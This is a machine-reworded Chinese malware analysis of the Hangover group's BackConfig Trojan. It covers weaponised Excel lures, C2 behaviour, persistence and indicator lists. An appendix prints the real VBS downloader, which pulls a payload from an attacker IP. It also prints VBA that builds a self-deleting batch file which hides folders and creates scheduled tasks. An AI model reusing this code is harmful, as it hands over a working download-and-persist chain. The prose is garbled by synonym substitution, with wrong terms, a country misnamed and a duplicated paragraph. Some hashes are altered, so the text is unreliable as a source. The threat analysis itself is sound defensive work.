关键词:有效载荷|元数据|基础设施|演变|初始|传播下载|创建|执行|753|计划任务|文件

PE元数据传播和安装第三方基础设施有效载荷演变小结

文章内容文件目录

初始剖析PE元数据传播和安裝第三方基础设施有效载荷演变小结ATT&CKIOCsDelivery DocumentsBatch FilesVBS filesEXE PayloadsInfrastructure附则Drive.txt -> Drive.vbs CODEAudio.txt -> Audio.bat CODE

科学研究工作人员过去4个月中发觉,Hangover机构(别名Neon,Viceroy Tiger,MONSOON)应用BackConfig恶意程序,根据渔叉式互联网中间人攻击东亚的政府部门前军​​事机构。BackConfig木马病毒具备灵便的软件系统架构,运用部件进行各种各样作用,包含搜集系统软件和键盘记录信息内容、提交和实行编码。

最开始感柒媒体是Microsoft Excel(XLS)文本文档,文本文档代管在合理合法网址,根据电子邮箱把网址URL发送至总体目标电子邮箱中。文本文档应用VBA宏代码,假如受害人开启了该编码,会起动木马下载程序安装,免费下载好几个控制模块进行木马病毒组装。模块化设计可使网络攻击迅速地变更单独部件,能够 毁坏沙盒和动态变化系统软件,尤其是在防护剖析部件时能够 切分故意个人行为。

初始剖析

在检索与特殊单位和國家/地域相关的AutoFocus数据信息时,最先发觉了Windows PEexe文件(SHA256:84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c)的主题活动。该文件于今年 1月19日初次出現,免费下载源为http://212.114.52[.]148/request/httpsrequest,文档以dphc.exe方式储存在当地。恶意程序容许网络攻击免费下载并实行exe文件,免费下载并运作批处理文件,在系统软件上运行命令。样版有自定的“破译”优化算法,从每一个标识符中减掉6,破译后得下列字符串数组:

linkrequest[.]live

\\Adobe\\Driver\\dwg\\pid.txt

\\Adobe\\Driver\\dwg\\

\\Adobe\\Driver\\dwg\\wuaupdt.exe

木马病毒从文件读取C2 URL,假如文档不会有,则撤出不实行一切主题活动。

%USERPROFILE%\Adobe\Driver\dwg\pid.txt

C2安全通道应用HTTPS,启用HttpOpenRequestA涵数时应用了INTERNET_FLAG_SECURE,信标HTTP恳求将以下所显示:

GET /orderme/[contents of pid.txt file] HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW

Host: linkrequest[.]live [resolving to 23.106.123[.]87]

木马病毒在HTTP回应头中搜索下列字段名合值:

“Content-Type: application”

“Content-Type: xDvsds”

“Content-Type: Bw11eW”

假如content-type字段名包括application值,木马病毒将从HTTP回应头中获取字符串数组文件夹名称和Content-Transfer-Encoding文件夹名称。应用此文件夹名称在%USERPROFILE%\Adobe\Driver\dwg\ folder中创建文件,在HTTP回应中载入数据信息。

假如content-type字段名数值xDvsds,木马病毒将试着应用ShellExecuteA和“ open”方式实行下列文档:

%USERPROFILE%\Adobe\Driver\dwg\wuaupdt.exe

假如content-type字段名的数值Bw11eW,木马病毒试着应用ShellExecuteA和“open”方式实行下列文档:

%USERPROFILE%\Adobe\Driver\dwg\test.bat

PE元数据

恶意程序样版包括自签字个人数字证书,这种exe文件宣称是来源于加利福尼亚州的Foxit Software Incorporated企业的手机软件, 根据订制的文件夹名称和URL的应用使恶意程序更为可靠。根据PE元数据,及其基本构造信息内容,可搜索别的BackConfig PE样版。 下边列举了以往12个月的样版:

下表显示信息了来源于同样PE文档的版本信息,:

传播和安裝

第三方基础设施

发觉与第三方基础设置相关的URL,这种第三方基础设置可适用BackConfig恶意程序的传播。下表列出了武器化XLS文档与文件夹名称:

根据对总体目标和第三方网站数据分析,网站地址中应用“fbr”将会与塔吉克斯坦联邦政府税局(fbr)相关。代管文档不依靠php脚本制作开展传播,网页页面回应情况301(永久性挪动)并将URL跳转到上述XLS,起动免费下载。网络攻击应用PHP脚本制作将页面访问纪录到“info.txt”文档中,文档纪录了时间日期、手机客户端电脑操作系统以及IP地址。

样版ed638b5于17年11月8日被发觉了,代管在2个网址上:孟加拉院校和Maldivan船务代理。

样版ed638b5的VBA编码立即从下边的URL免费下载的EXE合理负荷(SHA256:4104a871e03f12446ef2f0407177167a9c6679f48d48825cbc1584e4fa792cd)。

http://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe

有效载荷演变

下边的時间曲线图出示了网络攻击ttp的演变主视图:

每一个XLS都是载入一条虚报的不正确信息,以下图例,哄骗受害人认为该文件已损坏。

表3中列举的Form.xls(SHA256:be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)出示了网络攻击诱惑实例。

开启XLS并开启宏代码后,会显示信息一份注册表文件,內容与巴基斯坦政府协助处理本国住宅紧缺方案相关。

AutoFocus和VirusTotal在今年10月25日解决了XLS文档,发觉了nphp_registration_form.php?r= was processed,该URL与http://185.203.119[.]184/fin_div/session有关系,IP地址与样版be3f12b有关系, PHP网页页面nphp_registration_form.php的名字与XLS的文件夹名称相关。

XLS文档be3f12b中的VBA宏代码与前两年的样版各有不同。它不立即从VBA编码嵌入EXE文档或运作Shell命令,只是从Excel工作簿中从第27列或“ AA”刚开始的掩藏列上查找內容。在AA和AB列上发觉此前组合中的批处理命令编码部件及其新的Visual Basic Sc​​ript(VBS)下载工具部件,如下图5所显示。

今年11月15日发觉新的武器化XLS文档(SHA256:021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce69a)。VBA宏代码包括有1,062字节数尺寸的十进制编号的ZIP文档。ZIP文档内有两个文本文档,这种文档会被压缩包解压到文件夹名称driverkit中。

今年11月15日发觉新的武器化XLS文档(SHA256:021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce69a)。VBA宏代码包括有1,062字节数尺寸的十进制编号的ZIP文档。ZIP文档内有两个文本文档,这种文档会被压缩包解压到文件夹名称driverkit中。

Invoice.xls(SHA256:8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c;初次发觉时间:2020-01-15)。感柒全过程由好几个部件构成。 一旦VBA将其载入硬盘并实行,“setup”批处理命令(BAT)文档和BackConfig软件会对总体目标开展感柒。

1、创建文字文件Drive.txt(SHA-256:4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1),在其中包括十进制编解码的VBS。

2、VBA编码将批处理命令载入 Audio.txt。

3、Audio.txt重新命名为Audio.bat并执行。

4、Audio.bat会清除与此前感柒有关的全部文件和文件夹,并再次创建需要的自然环境(包含创建所述pid.txt)。

5、Audio.bat创建2个方案的每日任务引入2个文件:dphc.exe将每十分钟运作一次,Drive.vbs每二十分钟运作一次。

6、在删掉本身以前,Audio.bat会将Drive.txt重新命名为Drive.vbs。执行Drive.vbs时,它将下载BackConfig可执行文件合理负荷。

7、执行dphc.exe时,它最先查验pid.txt是不是存有(流程4),仅在文件存有的状况下再次运作。

最后,XLS将2个文件载入硬盘,BAT改动系统配置并创建2个计划任务。二十分钟后计划任务执行VBS下载器部件并起动BackConfig loader EXE。

小结

Hangover机构维持活跃性情况并具备目的性,对于东亚政府部门前军​​事机构应用渔叉式垂钓电子邮箱进攻,引诱受害人访问网址并下载带有BackConfig Trojan的Excel文本文档,从BackConfig的样版中发觉其执行指令和布署方法等。恶意程序模块化设计可使网络攻击轻轻松松地升级和器重编码,该机构将重中之重放到躲避沙盒和别的自动化技术检验。

ATT&CK

IOCs

IOCs

Delivery Documents

56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6

8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c

021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce69a

be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461

0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf

ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb

752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)

Batch Files

4BAFBF6000A003EB03F31023945A101813654D26B7F3E403D1F51B7608B93BCB (Audio.txt / .bat from Naya Housing campaign)

C94f7733fc9bdbc***3efd000e5aef66d494291ae40fc516bb040b0d1d9a46c9

6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3

750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580

5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295

f64dbcd9a75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e

98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e

29c5dd19b577162fe76a623d9a6dc558cfbd7cddca64ed53e870fe4b66b44096 (driverkit.bat)

abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)

02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea787c

VBS files

87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya Housing campaign)

952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c9a3ff8a651a231a (Down_LinkLog.vbs)

a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)

EXE Payloads

306fe259a250b2f0d939322cfb97787c4077c357fc9eb1f1cc10b0060f27f644

0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c9adbefb215fe92

84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c

18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd9a9

922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709

4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5

677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2

d3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f

91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1

de5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a

f79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c7cf19d361b0494e7b

9e141fe67521b75412419a8c88c199c8ebd2a135c7a8***edced454fbc33cb77

6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e

e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f

07c97b253452a2a8eb7753ed8c333efeaa3547c005ffcfb5b3d71dc61c49abda

31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848

15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892

D87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861

167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e

4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of downloaders)

b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)

Infrastructure

linkrequest[.]live (23.106.123[.]87)

matissues[.]com

unique.fontsupdate[.]com

185.203.119[.]184

212.114.52[.]148

附则

Drive.txt -> Drive.vbs CODE

strFileURL = "http://185.203.119[.]184/Dropbox/request" Set oShell = CreateObject("WScript.Shell")      strHomeFolder = oShell.ExpandEnvironmentStrings("%USERPROFILE%")      strPath = "C:\Drivers\dphc.exe"  On Error Resume Next Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")     objXMLHTTP.open "GET", strFileURL, false     objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1  objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0     Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.Fileexists(strPath) Then WScript.Quit() Set objFSO = Nothing objADOStream.SaveToFile strPath objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing  

Audio.txt -> Audio.bat CODE

Set oFile = fso.CreateTextFile("c:\Drivers\Audio.txt")oFile.WriteLine ("echo off")oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\pdf")oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\dwg")oFile.WriteLine ("md %USERPROFILE%\Daily\Backup\Files")oFile.WriteLine ("attrib a h s %USERPROFILE%\Adobe")oFile.WriteLine ("attrib a h s %USERPROFILE%\Daily")oFile.WriteLine ("attrib a h s C:\Drivers")oFile.WriteLine ("del /f %USERPROFILE%\Adobe\Driver\pdf\pid.txt")oFile.WriteLine ("del /f %USERPROFILE%\Adobe\Driver\dwg\pid.txt"oFile.WriteLine ("SET /A %COMPUTERNAME%")oFile.WriteLine ("SET /A RAND=%RANDOM% 10000 1")oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\Adobe\Driver\pdf\pid.txt")oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\Adobe\Driver\dwg\pid.txt")oFile.WriteLine ("schtasks /delete /tn Winmgt_log /f")oFile.WriteLine ("schtasks /delete /tn Yahoo_Drive /f")oFile.WriteLine ("schtasks /create /sc minute /mo 10 /f /tn Winmgt_log /tr C:\Drivers\dphc.exe")oFile.WriteLine ("schtasks /create /sc minute /mo 20 /f /tn Yahoo_Drive /tr C:\Drivers\Drive.vbs")oFile.WriteLine ("ren C:\Drivers\Drive.txt Drive.vbs ")oFile.WriteLine ("del %0")oFile.CloseSet fso = NothingSet oFile = Nothing    Dim OldName, NewName    GivenLocation = "C:\Drivers\"    OldName = "Audio.txt"    NewName = "Audio.bat"    On Error Resume Next    Name GivenLocation & OldName As GivenLocation & NewName    Dim RetVal    RetVal = Shell("C:\Drivers\Audio.bat", vbHide)

*参照来源于:paloaltonetworks,由Kriston编译程序,转截请标明来源于FreeBuf.COM

猜你喜欢